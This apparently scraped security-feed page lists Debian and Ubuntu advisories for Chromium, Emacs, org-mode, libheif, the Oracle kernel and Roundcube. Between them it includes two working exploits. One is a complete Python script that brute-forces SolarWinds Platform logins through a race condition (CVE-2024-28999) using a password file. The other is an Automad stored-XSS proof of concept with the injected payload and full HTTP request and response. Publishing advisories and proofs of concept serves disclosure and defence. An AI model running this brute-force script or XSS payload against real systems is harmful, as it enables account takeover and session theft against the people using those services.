Ollama versions prior to 0.1.34 suffer from a remote code execution vulnerability.

Ollama Remote Code Execution

Debian Linux Security Advisory 5720-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5720-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonJune 25, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-6290 CVE-2024-6291 CVE-2024-6292 CVE-2024-6293Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 126.0.6478.126-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmZ7iCsACgkQZF0CR8NudjeZWQ/+OZWXz7T52DkWQeWComrkEqLiOn74kDdkNvKPzi7+miDRBOaADj6r8R/yGvdf3ruxU9GlIeiCelVId62VHJaWkgiPSbWGaiNQk4Ux+BD+L0ng3XPxRBwKhf+MNDA/7WhlHd9npFDHpL0I+JNzKQdotGLbhVAwMATcfxXPK0wgQZabBfLfA9WhafdjqpN2rgRvBLYjlJbQOu9w66O+4IWhleIRBpboKJYKOpfPB71r1gGGrJS/CfcRo7bo4ppk1ZmB7tkAmDRkWTJJMwtaOMSVBmR8ti1fMGPOL02mElOeRaq2PnUA/FHIHClc8uqBz70cWLSuySMG6PCvy19ck/9LBCxS1BfwyEmdN3nmKpu2Ig1UsykcQhMiqcqNG9iYmp37jOoPNUPjKkdzqTx30OWMLAWHFg2RxMKNlQJGZfxOQPt62wJOz9dSsNegunNnQIPLOzkFnkkl87AHMPcyLz9UxKgI2svP3F3cJk5M7MI3WHQJUQUS+0OgG+fCxk95jIm9munt46+99wb9E5wM39cUIieYVx56m5gAS21LxgHkFid3jeTRg7pqC8ObEyh9WL5c+Ssh3zvt5O74bFpzjFCxvD8V2RRRFKOBbaSxPkou05DZHEBHQvWRG+UobmvmBaz4a+gwg1/9TfUPCUeduLmz9mAe67o3RNemGXnAb20QST8==vb9g-----END PGP SIGNATURE-----

Debian Security Advisory 5720-1

Ubuntu Security Notice 6847-1 - It was discovered that libheif incorrectly handled certain image data. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affected Ubuntu 18.04 LTS. Reza Mirzazade Farkhani discovered that libheif incorrectly handled certain image data. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affected Ubuntu 20.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6847-1June 25, 2024libheif vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:libheif could be made to crash if it opened a specially craftedfile.Software Description:- libheif: ISO/IEC 23008-12:2017 HEIF file format decoder - development fileDetails:It was discovered that libheif incorrectly handled certain image data.An attacker could possibly use this issue to crash the program, resultingin a denial of service. This issue only affected Ubuntu 18.04 LTS.(CVE-2019-11471)Reza Mirzazade Farkhani discovered that libheif incorrectly handledcertain image data. An attacker could possibly use this issue to crash theprogram, resulting in a denial of service. This issue only affected Ubuntu20.04 LTS. (CVE-2020-23109)Eugene Lim discovered that libheif incorrectly handled certain image data.An attacker could possibly use this issue to crash the program, resultingin a denial of service. This issue only affected Ubuntu 18.04 LTS, Ubuntu20.04 LTS and Ubuntu 22.04 LTS. (CVE-2023-0996)Min Jang discovered that libheif incorrectly handled certain image data.An attacker could possibly use this issue to crash the program, resultingin a denial of service. This issue only affected Ubuntu 20.04 LTS andUbuntu 22.04 LTS. (CVE-2023-29659)Yuchuan Meng discovered that libheif incorrectly handled certain image data.An attacker could possibly use this issue to crash the program, resultingin a denial of service. This issue only affected Ubuntu 23.10.(CVE-2023-49460, CVE-2023-49462, CVE-2023-49463, CVE-2023-49464)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10   heif-gdk-pixbuf                 1.16.2-2ubuntu1.1   libheif-dev                     1.16.2-2ubuntu1.1   libheif-plugin-libde265         1.16.2-2ubuntu1.1   libheif1                        1.16.2-2ubuntu1.1Ubuntu 22.04 LTS   heif-gdk-pixbuf                 1.12.0-2ubuntu0.1~esm1                                   Available with Ubuntu Pro   libheif-dev                     1.12.0-2ubuntu0.1~esm1                                   Available with Ubuntu Pro   libheif1                        1.12.0-2ubuntu0.1~esm1                                   Available with Ubuntu ProUbuntu 20.04 LTS   heif-gdk-pixbuf                 1.6.1-1ubuntu0.1~esm1                                   Available with Ubuntu Pro   libheif-dev                     1.6.1-1ubuntu0.1~esm1                                   Available with Ubuntu Pro   libheif1                        1.6.1-1ubuntu0.1~esm1                                   Available with Ubuntu ProUbuntu 18.04 LTS   libheif-dev                     1.1.0-2ubuntu0.1~esm1                                   Available with Ubuntu Pro   libheif1                        1.1.0-2ubuntu0.1~esm1                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6847-1   CVE-2019-11471, CVE-2020-23109, CVE-2023-0996, CVE-2023-29659,   CVE-2023-49460, CVE-2023-49462, CVE-2023-49463, CVE-2023-49464Package Information:   https://launchpad.net/ubuntu/+source/libheif/1.16.2-2ubuntu1.1

Ubuntu Security Notice USN-6847-1

Debian Linux Security Advisory 5719-1 - It was discovered that Emacs is prone to arbitrary shell code evaluation when opening a specially crafted Org file.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5719-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
June 25, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : emacs  
CVE ID         : CVE-2024-39331  
Debian Bug     : 1074137

It was discovered that Emacs is prone to arbitrary shell code evaluation  
when opening a specially crafted Org file.

This update includes updates pending for the upcoming point releases  
including other security fixes.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 1:27.1+1-3.1+deb11u5.

For the stable distribution (bookworm), this problem has been fixed in  
version 1:28.2+1-15+deb12u3.

We recommend that you upgrade your emacs packages.

For the detailed security status of emacs please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/emacs

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmZ7IMRfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RRkQ//VodTfx1QWzYCV1WDvv2c6lekODGI1RQcM91+LRXnq+LsumEP55j5w26V  
9O1u3Yze/94BVOzlggM3CzPLGeDS1gYDAGvoaZVrkgsK9k9DCN5vKJ3BSJf6vzj7  
wtFVvlmnqIsMLUlu6yUpQlsDw6fhwKqrh4egIigDFSwR8kxzo+wBhTGVfuFLpmxl  
X0B1xAMWsk8srmWxcgvabMvGhSx+z06QHnsguLWljvk+yEQVfVTYqVA3PxySg/Qk  
/7SPwEBuWwe0MU6s4pltET/VdNI7nYeG2qSmWZ6ruFcYa2Xctoe+r2kQ02ngipJK  
RZScLFYmxbRqKDGTayNbXvAE9X6P05bhQvpYoYsnTueYrH5JzB++6Zli43PnT6aj  
ECMHPl7RKv6JOjqZB4VJpfsLw9S8QBkMPtSZ3zfy8/GSX8/113F8k4ur3pu/S3gH  
N8FWbygOYw6MrC7LeKKE77k43Tep1bEQPd6EwwlopjIulDg00tEGXXH9JdmXKH0V  
grgZTPubZvB/RrtW/AHkMrEDGdz9BfEnSxIOrPjbT//9tBVsxSN8jUflxUIoiCew  
v9yw6YUXKaRrIgcvMy/GMg/uaIZmxvYYVlO4eg7QHQ4trwaTtANjUFIya4PCpegu  
zjJS/rfx1BKpDDFQhJY25e7Tj6zfLV57GAb/rrZhRHRGQUCaBqQ=  
=62XM  
-----END PGP SIGNATURE-----

Debian Security Advisory 5719-1

Ubuntu Security Notice 6819-4 - Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kernel did not properly validate H2C PDU data, leading to a null pointer dereference vulnerability. A remote attacker could use this to cause a denial of service. Chenyuan Yang discovered that the RDS Protocol implementation in the Linux kernel contained an out-of-bounds read vulnerability. An attacker could use this to possibly cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6819-4June 26, 2024linux-oracle-6.5 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-oracle-6.5: Linux kernel for Oracle Cloud systemsDetails:Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kerneldid not properly validate H2C PDU data, leading to a null pointerdereference vulnerability. A remote attacker could use this to cause adenial of service (system crash). (CVE-2023-6356, CVE-2023-6535,CVE-2023-6536)Chenyuan Yang discovered that the RDS Protocol implementation in the Linuxkernel contained an out-of-bounds read vulnerability. An attacker could usethis to possibly cause a denial of service (system crash). (CVE-2024-23849)It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a null pointer dereference vulnerability. Aprivileged local attacker could use this to possibly cause a denial ofservice (system crash). (CVE-2024-24860)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM64 architecture;   - PowerPC architecture;   - RISC-V architecture;   - S390 architecture;   - Core kernel;   - x86 architecture;   - Block layer subsystem;   - Cryptographic API;   - ACPI drivers;   - Android drivers;   - Drivers core;   - Power management core;   - Bus devices;   - Device frequency scaling framework;   - DMA engine subsystem;   - EDAC drivers;   - ARM SCMI message protocol;   - GPU drivers;   - IIO ADC drivers;   - InfiniBand drivers;   - IOMMU subsystem;   - Media drivers;   - Multifunction device drivers;   - MTD block device drivers;   - Network drivers;   - NVME drivers;   - Device tree and open firmware driver;   - PCI driver for MicroSemi Switchtec;   - Power supply drivers;   - RPMSG subsystem;   - SCSI drivers;   - QCOM SoC drivers;   - SPMI drivers;   - Thermal drivers;   - TTY drivers;   - VFIO drivers;   - BTRFS file system;   - Ceph distributed file system;   - EFI Variable file system;   - EROFS file system;   - Ext4 file system;   - F2FS file system;   - GFS2 file system;   - JFS file system;   - Network file systems library;   - Network file system server daemon;   - File systems infrastructure;   - Pstore file system;   - ReiserFS file system;   - SMB network file system;   - BPF subsystem;   - Memory management;   - TLS protocol;   - Ethernet bridge;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Logical Link layer;   - MAC80211 subsystem;   - Multipath TCP;   - Netfilter;   - NetLabel subsystem;   - Network traffic control;   - SMC sockets;   - Sun RPC protocol;   - AppArmor security module;   - Intel ASoC drivers;   - MediaTek ASoC drivers;   - USB sound devices;(CVE-2023-52612, CVE-2024-26808, CVE-2023-52691, CVE-2023-52618,CVE-2023-52463, CVE-2023-52447, CVE-2024-26668, CVE-2023-52454,CVE-2024-26670, CVE-2024-26646, CVE-2023-52472, CVE-2024-26586,CVE-2023-52681, CVE-2023-52453, CVE-2023-52611, CVE-2023-52622,CVE-2024-26641, CVE-2023-52616, CVE-2024-26592, CVE-2023-52606,CVE-2024-26620, CVE-2023-52692, CVE-2024-26669, CVE-2023-52623,CVE-2023-52588, CVE-2024-26616, CVE-2024-26610, CVE-2024-35839,CVE-2023-52490, CVE-2023-52672, CVE-2024-26612, CVE-2023-52617,CVE-2023-52697, CVE-2024-26644, CVE-2023-52458, CVE-2023-52598,CVE-2024-35841, CVE-2023-52664, CVE-2023-52635, CVE-2023-52676,CVE-2023-52669, CVE-2024-26632, CVE-2023-52486, CVE-2024-26625,CVE-2023-52608, CVE-2024-26634, CVE-2023-52599, CVE-2024-26618,CVE-2024-26640, CVE-2023-52489, CVE-2023-52675, CVE-2023-52678,CVE-2024-26583, CVE-2023-52693, CVE-2023-52498, CVE-2024-26649,CVE-2023-52670, CVE-2023-52473, CVE-2023-52449, CVE-2023-52667,CVE-2023-52467, CVE-2023-52686, CVE-2024-26633, CVE-2023-52666,CVE-2024-35840, CVE-2024-26629, CVE-2024-26595, CVE-2023-52593,CVE-2023-52687, CVE-2023-52465, CVE-2024-26627, CVE-2023-52493,CVE-2023-52491, CVE-2024-26636, CVE-2024-26584, CVE-2023-52587,CVE-2023-52597, CVE-2023-52462, CVE-2023-52633, CVE-2023-52696,CVE-2024-26585, CVE-2023-52589, CVE-2023-52456, CVE-2023-52470,CVE-2024-35838, CVE-2024-26645, CVE-2023-52591, CVE-2023-52464,CVE-2023-52609, CVE-2024-26608, CVE-2023-52450, CVE-2023-52584,CVE-2023-52469, CVE-2023-52583, CVE-2023-52451, CVE-2023-52495,CVE-2023-52626, CVE-2023-52595, CVE-2023-52680, CVE-2023-52632,CVE-2024-26582, CVE-2024-35837, CVE-2023-52494, CVE-2023-52614,CVE-2023-52443, CVE-2023-52698, CVE-2023-52448, CVE-2024-26615,CVE-2023-52452, CVE-2023-52492, CVE-2024-26647, CVE-2023-52468,CVE-2023-52594, CVE-2023-52621, CVE-2024-26638, CVE-2024-26594,CVE-2024-26673, CVE-2023-52457, CVE-2023-52677, CVE-2023-52607,CVE-2024-26623, CVE-2023-52488, CVE-2023-52497, CVE-2023-52445,CVE-2024-26607, CVE-2023-52610, CVE-2024-35842, CVE-2023-52690,CVE-2023-52683, CVE-2023-52444, CVE-2024-26671, CVE-2023-52455,CVE-2023-52679, CVE-2024-26598, CVE-2023-52674, CVE-2023-52627,CVE-2023-52619, CVE-2023-52487, CVE-2023-52446, CVE-2024-35835,CVE-2023-52682, CVE-2023-52685, CVE-2023-52694, CVE-2024-26631)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   linux-image-6.5.0-1024-oracle   6.5.0-1024.24~22.04.1   linux-image-6.5.0-1024-oracle-64k  6.5.0-1024.24~22.04.1   linux-image-oracle              6.5.0.1024.24~22.04.1   linux-image-oracle-64k          6.5.0.1024.24~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6819-4   https://ubuntu.com/security/notices/USN-6819-1   CVE-2023-52443, CVE-2023-52444, CVE-2023-52445, CVE-2023-52446,   CVE-2023-52447, CVE-2023-52448, CVE-2023-52449, CVE-2023-52450,   CVE-2023-52451, CVE-2023-52452, CVE-2023-52453, CVE-2023-52454,   CVE-2023-52455, CVE-2023-52456, CVE-2023-52457, CVE-2023-52458,   CVE-2023-52462, CVE-2023-52463, CVE-2023-52464, CVE-2023-52465,   CVE-2023-52467, CVE-2023-52468, CVE-2023-52469, CVE-2023-52470,   CVE-2023-52472, CVE-2023-52473, CVE-2023-52486, CVE-2023-52487,   CVE-2023-52488, CVE-2023-52489, CVE-2023-52490, CVE-2023-52491,   CVE-2023-52492, CVE-2023-52493, CVE-2023-52494, CVE-2023-52495,   CVE-2023-52497, CVE-2023-52498, CVE-2023-52583, CVE-2023-52584,   CVE-2023-52587, CVE-2023-52588, CVE-2023-52589, CVE-2023-52591,   CVE-2023-52593, CVE-2023-52594, CVE-2023-52595, CVE-2023-52597,   CVE-2023-52598, CVE-2023-52599, CVE-2023-52606, CVE-2023-52607,   CVE-2023-52608, CVE-2023-52609, CVE-2023-52610, CVE-2023-52611,   CVE-2023-52612, CVE-2023-52614, CVE-2023-52616, CVE-2023-52617,   CVE-2023-52618, CVE-2023-52619, CVE-2023-52621, CVE-2023-52622,   CVE-2023-52623, CVE-2023-52626, CVE-2023-52627, CVE-2023-52632,   CVE-2023-52633, CVE-2023-52635, CVE-2023-52664, CVE-2023-52666,   CVE-2023-52667, CVE-2023-52669, CVE-2023-52670, CVE-2023-52672,   CVE-2023-52674, CVE-2023-52675, CVE-2023-52676, CVE-2023-52677,   CVE-2023-52678, CVE-2023-52679, CVE-2023-52680, CVE-2023-52681,   CVE-2023-52682, CVE-2023-52683, CVE-2023-52685, CVE-2023-52686,   CVE-2023-52687, CVE-2023-52690, CVE-2023-52691, CVE-2023-52692,   CVE-2023-52693, CVE-2023-52694, CVE-2023-52696, CVE-2023-52697,   CVE-2023-52698, CVE-2023-6356, CVE-2023-6535, CVE-2023-6536,   CVE-2024-23849, CVE-2024-24860, CVE-2024-26582, CVE-2024-26583,   CVE-2024-26584, CVE-2024-26585, CVE-2024-26586, CVE-2024-26592,   CVE-2024-26594, CVE-2024-26595, CVE-2024-26598, CVE-2024-26607,   CVE-2024-26608, CVE-2024-26610, CVE-2024-26612, CVE-2024-26615,   CVE-2024-26616, CVE-2024-26618, CVE-2024-26620, CVE-2024-26623,   CVE-2024-26625, CVE-2024-26627, CVE-2024-26629, CVE-2024-26631,   CVE-2024-26632, CVE-2024-26633, CVE-2024-26634, CVE-2024-26636,   CVE-2024-26638, CVE-2024-26640, CVE-2024-26641, CVE-2024-26644,   CVE-2024-26645, CVE-2024-26646, CVE-2024-26647, CVE-2024-26649,   CVE-2024-26668, CVE-2024-26669, CVE-2024-26670, CVE-2024-26671,   CVE-2024-26673, CVE-2024-26808, CVE-2024-35835, CVE-2024-35837,   CVE-2024-35838, CVE-2024-35839, CVE-2024-35840, CVE-2024-35841,   CVE-2024-35842Package Information:   https://launchpad.net/ubuntu/+source/linux-oracle-6.5/6.5.0-1024.24~22.04.1

Ubuntu Security Notice USN-6819-4

Ubuntu Security Notice 6848-1 - Matthieu Faou and Denys Klymenko discovered that Roundcube incorrectly handled certain SVG images. A remote attacker could possibly use this issue to load arbitrary JavaScript code. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS and Ubuntu 23.10. Rene Rehme discovered that Roundcube incorrectly handled certain headers. A remote attacker could possibly use this issue to load arbitrary JavaScript code. This issue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS and Ubuntu 23.10.

==========================================================================  
Ubuntu Security Notice USN-6848-1  
June 25, 2024

roundcube vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Roundcube could be made to crash or run programs if it received specially  
crafted input.

Software Description:  
- roundcube: skinnable AJAX based webmail solution for IMAP servers - metapack

Details:

Matthieu Faou and Denys Klymenko discovered that Roundcube incorrectly  
handled certain SVG images. A remote attacker could possibly use this  
issue to load arbitrary JavaScript code. This issue only affected Ubuntu  
18.04 LTS, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS and Ubuntu 23.10.  
(CVE-2023-5631)

Rene Rehme discovered that Roundcube incorrectly handled certain headers.  
A remote attacker could possibly use this issue to load arbitrary  
JavaScript code. This issue only affected Ubuntu 20.04 LTS,  
Ubuntu 22.04 LTS and Ubuntu 23.10. (CVE-2023-47272)

Valentin T. and Lutz Wolf discovered that Roundcube incorrectly handled  
certain SVG images. A remote attacker could possibly use this issue to  
load arbitrary JavaScript code. This issue only affected Ubuntu 18.04 LTS,  
Ubuntu 20.04 LTS, Ubuntu 22.04 LTS and Ubuntu 23.10. (CVE-2024-37383)

Huy Nguyễn Phạm Nhật discovered that Roundcube incorrectly handled  
certain fields in user preferences. A remote attacker could possibly use  
this issue to load arbitrary JavaScript code. (CVE-2024-37384)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10  
   roundcube                       1.6.2+dfsg-1ubuntu0.2  
   roundcube-core                  1.6.2+dfsg-1ubuntu0.2

Ubuntu 22.04 LTS  
   roundcube                       1.5.0+dfsg.1-2ubuntu0.1~esm3  
                                   Available with Ubuntu Pro  
   roundcube-core                  1.5.0+dfsg.1-2ubuntu0.1~esm3  
                                   Available with Ubuntu Pro

Ubuntu 20.04 LTS  
   roundcube                       1.4.3+dfsg.1-1ubuntu0.1~esm4  
                                   Available with Ubuntu Pro  
   roundcube-core                  1.4.3+dfsg.1-1ubuntu0.1~esm4  
                                   Available with Ubuntu Pro

Ubuntu 18.04 LTS  
   roundcube                       1.3.6+dfsg.1-1ubuntu0.1~esm4  
                                   Available with Ubuntu Pro  
   roundcube-core                  1.3.6+dfsg.1-1ubuntu0.1~esm4  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   roundcube                       1.2~beta+dfsg.1-0ubuntu1+esm4  
                                   Available with Ubuntu Pro  
   roundcube-core                  1.2~beta+dfsg.1-0ubuntu1+esm4  
                                   Available with Ubuntu Pro

After a standard system update you need to restart Roundcube to make  
all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6848-1  
   CVE-2023-47272, CVE-2023-5631, CVE-2024-37383, CVE-2024-37384,  
   https://launchpad.net/bugs/2043396

Package Information:  
   https://launchpad.net/ubuntu/+source/roundcube/1.6.2+dfsg-1ubuntu0.2

Ubuntu Security Notice USN-6848-1

SolarWinds Platform version 2024.1 SR1 suffers from a race condition vulnerability.

    # Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition# CVE: CVE-2024-28999# Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions# Author: Elhussain Fathy, AKA 0xSphinximport requestsimport urllib3import asyncioimport aiohttpurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED')# host = '192.168.1.1'# username = "admin"# file_path = "passwords.txt"host = input("Enter the host: ")username = input("Enter the username: ")file_path = input("Enter the passwords file path: ")exploited = 0url = f"https://{host}:443/Orion/Login.aspx?ReturnUrl=%2F"passwords = []with open(file_path, 'r') as file:    for line in file:        word = line.strip()        passwords.append(word)print(f"Number of tested passwords: {len(passwords)}")headers = {    'Host': host,}sessions = []for _ in range(len(passwords)):    response = requests.get(url, headers=headers, verify=False, stream=False)    cookies = response.headers.get('Set-Cookie', '')    session_id = cookies.split('ASP.NET_SessionId=')[1].split(';')[0]    sessions.append(session_id)async def send_request(session, username, password):    headers = {        'Host': host,          'Content-Type': 'application/x-www-form-urlencoded',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',        'Cookie': f'ASP.NET_SessionId={session}; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE',    }    data = f'__EVENTTARGET=ctl00%24BodyContent%24LoginButton&__EVENTARGUMENT=&__VIEWSTATE=AEQKNijmHeR5jZhMrrXSjzPRqhTz%2BoTqkfNmc3EcMLtc%2FIjqS37FtvDMFn83yUTgHBJIlMRHwO0UVUVzwcg2cO%2B%2Fo2CEYGVzjB1Ume1UkrvCOFyR08HjFGUJOR4q9GX0fmhVTsvXxy7A2hH64m5FBZTL9dfXDZnQ1gUvFp%2BleWgLTRssEtTuAqQQxOLA3nQ6n9Yx%2FL4QDSnEfB3b%2FlSWw8Xruui0YR5kuN%2BjoOH%2BEC%2B4wfZ1%2BCwYOs%2BLmIMjrK9TDFNcWTUg6HHiAn%2By%2B5wWpsj7qiJG3%2F1uhWb8fFc8Mik%3D&__VIEWSTATEGENERATOR=01070692&ctl00%24BodyContent%24Username={username}&ctl00%24BodyContent%24Password={password}'    async with aiohttp.ClientSession() as session:        async with session.post(url, headers=headers, data=data, ssl=False, allow_redirects=False) as response:            if response.status == 302:                global exploited                exploited = 1                print(f"Exploited Successfully Username: {username}, Password: {password}")async def main():    tasks = []    for i in range(len(passwords)):        session = sessions[i]        password = passwords[i]        task = asyncio.create_task(send_request(session, username, password))        tasks.append(task)    await asyncio.gather(*tasks)asyncio.run(main())if(not exploited):    print("Exploitation Failed")

SolarWinds Platform 2024.1 SR1 Race Condition

Automad version 2.0.0-alpha.4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)# Date: 20-06-2024# Exploit Author: Jerry Thomas (w3bn00b3r)# Vendor Homepage: https://automad.org# Software Link: https://github.com/marcantondahmen/automad# Category: Web Application [Flat File CMS]# Version: 2.0.0-alpha.4# Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11(bullseye)# DescriptionA persistent (stored) cross-site scripting (XSS) vulnerability has beenidentified in Automad 2.0.0-alpha.4. This vulnerability enables an attackerto inject malicious JavaScript code into the template body. The injectedcode is stored within the flat file CMS and is executed in the browser ofany user visiting the forum. This can result in session hijacking, datatheft, and other malicious activities.# Proof-of-Concept*Step-1:* Login as Admin & Navigate to the endpointhttp://localhost/dashboard/home*Step-2:* There will be a default Welcome page. You will find an option toedit it.*Step-3:* Navigate to Content tab orhttp://localhost/dashboard/page?url=%2F&section=text & edit the block named***`Main`****Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)>*Request:*POST /_api/page/data HTTP/1.1Host: localhostContent-Length: 1822User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCvAccept: */*Origin: http://localhostReferer: http://localhost/dashboard/page?url=%2F&section=textAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie:Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cbConnection: close------WebKitFormBoundaryzHmXQBdtZsTYQYCvContent-Disposition: form-data; name="__csrf__"49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1------WebKitFormBoundaryzHmXQBdtZsTYQYCvContent-Disposition: form-data; name="__json__"{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testingforxss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSSidentified byJerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"Youhave successfully installed Automad 2.<br><br><img src=xonerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"VisitDashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}------WebKitFormBoundaryzHmXQBdtZsTYQYCv--*Response:*HTTP/1.1 200 OKServer: nginx/1.24.0Date: Thu, 20 Jun 2024 19:17:35 GMTContent-Type: application/json; charset=utf-8Connection: closeX-Powered-By: PHP/8.3.6Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 30`{"code":200,"time":1718911055}*Step-5:* XSS triggers when you go to homepage - http://localhost/

Automad 2.0.0-alpha.4 Cross Site Scripting

Debian Linux Security Advisory 5718-1 - It was discovered that Org Mode for Emacs is prone to arbitrary shell code evaluation when opening a specially crafted Org file.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5718-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
June 25, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : org-mode  
CVE ID         : CVE-2024-39331  
Debian Bug     : 1074136

It was discovered that Org Mode for Emacs is prone to arbitrary shell  
code evaluation when opening a specially crafted Org file.

This update includes updates pending for the upcoming point releases  
including other security fixes.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 9.4.0+dfsg-1+deb11u3.

We recommend that you upgrade your org-mode packages.

For the detailed security status of org-mode please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/org-mode

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmZ7HkJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
